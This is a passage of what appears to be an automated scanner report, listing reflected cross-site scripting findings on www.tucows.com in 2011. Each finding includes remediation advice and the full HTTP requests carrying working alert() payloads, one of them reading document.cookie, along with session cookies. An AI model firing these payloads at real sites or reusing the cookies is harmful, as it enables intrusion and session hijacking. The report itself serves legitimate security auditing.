HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:37 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6080c"-alert(1)-"416c9945040 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets6080c"-alert(1)-"416c9945040/search.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:53 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86474"-alert(1)-"fc2d258ee4e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/search.html86474"-alert(1)-"fc2d258ee4e HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:29:07 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.331. http://www.tucows.com/images/newassets/search.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.tucows.com
Path: /images/newassets/search.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e494d"-alert(1)-"4b77aa9c219 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/search.html?e494d"-alert(1)-"4b77aa9c219=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:07 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af8d9"-alert(1)-"92a1570dd92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imagesaf8d9"-alert(1)-"92a1570dd92/newassets/sitemap.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:55 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82496"-alert(1)-"c8a91aceec7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets82496"-alert(1)-"c8a91aceec7/sitemap.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:13 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload caf6a"-alert(1)-"44f43ba9b50 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/sitemap.htmlcaf6a"-alert(1)-"44f43ba9b50 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:25 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.335. http://www.tucows.com/images/newassets/sitemap.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.tucows.com
Path: /images/newassets/sitemap.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 220eb"-alert(1)-"e4076721429 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/sitemap.html?220eb"-alert(1)-"e4076721429=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:30 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33aa5"-alert(1)-"59cc111f4af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images33aa5"-alert(1)-"59cc111f4af/newassets/terms.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:06 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b47ad"-alert(1)-"799fe703e28 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassetsb47ad"-alert(1)-"799fe703e28/terms.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:18 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 102d4"-alert(1)-"f3c9b91e18e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/terms.html102d4"-alert(1)-"f3c9b91e18e HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:37 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.339. http://www.tucows.com/images/newassets/terms.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.tucows.com
Path: /images/newassets/terms.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5eabf"-alert(1)-"20d1d0ffbba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/terms.html?5eabf"-alert(1)-"20d1d0ffbba=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:38 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae2fb"-alert(1)-"6d8934a62dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includesae2fb"-alert(1)-"6d8934a62dd/corpbar/cb3.0/css/style.css HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:37 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 31900
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f85d"-alert(1)-"109c256849a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/corpbar3f85d"-alert(1)-"109c256849a/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
